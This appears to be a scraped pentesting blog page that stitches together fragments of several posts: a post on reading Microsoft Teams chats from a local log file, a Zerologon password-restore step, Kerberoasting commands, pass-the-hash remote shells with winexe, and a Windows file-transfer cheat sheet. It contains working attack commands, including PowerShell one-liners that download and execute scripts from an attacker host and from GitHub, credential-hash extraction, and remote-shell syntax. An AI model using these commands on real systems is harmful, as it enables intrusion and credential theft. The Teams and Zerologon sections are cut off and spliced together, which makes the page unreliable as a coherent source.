General Blog

Your Microsoft Teams chats aren’t as private as you think..

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More Microsoft Teams is a proprietary business communication platform developed by Microsoft, as part of the Microsoft 365 family of products. Teams primarily competes with the similar service Slack, offering workspace chat and videoconferencing, file storage, and application integration, and is used by hundreds of thousands of organizations across the world. While some companies have policies that instruct users not to send sensitive information through cleartext channels, like Microsoft Teams, I’ve came across many organizations that do not adopt this behavior. A compromised Office 365 account could lead to all kinds of trouble, including giving an attacker access to communicated passwords, AWS keys, or PII through Microsoft Teams. To help counter this, companies may implement strict Conditional Access Policies and require MFA in order to gain access to a user’s Office 365 account. But what if I told you that you didn’t need the Office 365 account to read messages sent in Microsoft Teams? Follow along and I’ll show you how access to a hard drive could be all an attacker needs to gain access to your “secret” Teams chats. Where do Microsoft Teams messages live? It’s no secret that Microsoft Teams is a cloud-based collaboration tool, so there is no doubt that the data sent to/from Microsoft Teams is stored in Microsoft’s cloud. However, it turns out that chat messages sent through Microsoft Teams also gets stored locally on a filesystem in the following location. %AppData%\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb Within this directory is a .log file that contains a lot of information. At first glance, you may think the file just contains a bunch of computer gibberish, but sorting through the data can reveal some valuable secrets. Let’s prove a concept. So take a scenario where an end-user asks another end-user for help signing into an account. In this case, Michael Scott is asking Pam for his computer login since he can never remember. He sends the message through Teams, perhaps on his phone, and Pam replies. Now let’s go review that log file on either one of their computers that has Teams up and running. Any user that has local administrator access to this computer would be able to access this file, even for other users on the system. Surely there is a way to parse this data natively in Windows, but the following command works very nicely in Linux, so I will just copy the log file off the system and place it onto my Kali box. cat teams.log | grep \<div\> -A 2 | grep '\<div\>\|display' | cut -d ">" -f 2 | cut -d "<" -f 1 | uniq | sed 's/imdisplayname//g' | tr -d \"  The output of the command isn’t the most graceful, but there’s enough text here to make out the gist of the conversation. @_Xenov made a PowerShell parser that you can find below, or on GitHub. $firstString = "<div"
$secondString = "div>"$importPath = "$Env:AppData\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log"$text = Get-Content $importPath #Sample pattern$pattern = "(?<=$firstString).*?(?=$secondString)"

$output = [regex]::Matches($text,$pattern).value$hash = @{}

Restoring the Environment

The proof-of-concept exploit code also includes a script for restoring the old credential post-exploitation. To do this, you can grab the hex encoded machine password from the secretsdump.py output and then use the following command.

sudo python restorepassword.py <domain>/<hostname>@<hostname> -target-ip <target-IP> -hexpass <hex-credential>

Patching the Exploit

A patch is available from Microsoft at the following URL. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

While the above mentioned article includes a table with a list of patches, I’d highly recommend checking the Windows Update Catalog for patches that might have superseded the articles mentioned in this table. For example, the September roll-ups contain this patch and are not listed in the table.

Running this exploit against a machine that has received the patch will return the following result.

Donations and Support:
Like my content? Please consider supporting me on Patreon:

Purchase a VPN Using my Affiliate Link

Hacking Tutorial

Performing Kerberoast Attacks in Windows Active Directory

Without Authenticated User:

Some user accounts may be configured with ‘Do not require Kerberos preauthentication‘ set. For accounts that are configured in this way, we may not need valid user credentials to extract TGTs for cracking. The following tool from Impacket can help with this.

./GetNPUsers.py -dc-ip <targetIP> -request '<FQDN>/' -format hashcat

With Authenticated User:

Once you have low-level credentials to a Windows domain, you may be able to leverage those credentials to perform a Kerberoast attack against a higher-level user account. The easiest way to identify if a user account is vulnerable to a Kerberoast attack is via BloodHound.

Once you have identified a Kerberoastable user, you can leverage Impacket to perform the attack w/ the following command. This command will require valid domain credentials for at least a low-level user, but it should return the password hash of any Kerberoastable user on the domain.

GetUserSPNs.py -request -dc-ip <ip-addr> <domain>/<user>

Alternatively, you could also use the following PowerShell one-liner.

IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt

We can then take this password hash to hashcat with the following command.

hashcat -m 13100 <hashfile> <wordlist>

Tips & Tricks

Popping Remote Shells w/ winexe & pth-winexe on Windows

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash.

Basic syntax w/ credentials.

winexe -U <domain/username>%<password> //<targetIP> cmd.exe

Basic syntax w/ NTLM hash (pass the hash technique).

pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.

Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80

Impacket SMB Server

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> <path>

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password> Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands: $pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>',$pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred Downloading Files PowerShell The following will download and store a remote file to disk. Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe" The following will download and automatically execute the remote PowerShell script when ran from a command prompt. powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1') An alternative to the above is to use Invoke-WebRequest in a different manner. powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)" CertUtil The following will download and store a remote file to disk. certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe Windows Defender The following will download and store a remote file to disk. MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file] Transferring with SSH To copy a file from B to A while logged into B: scp /path/to/file username@a:/path/to/destination To copy a file from B to A while logged into A: scp username@b:/path/to/file /path/to/destination Transferring via Base64 Encoding From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files. Within PowerShell, you can encode a file by running: $file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)
[System.Convert]::ToBase64String(\$file-encode)
echo -n <base64String> | base64 -d > filename.txt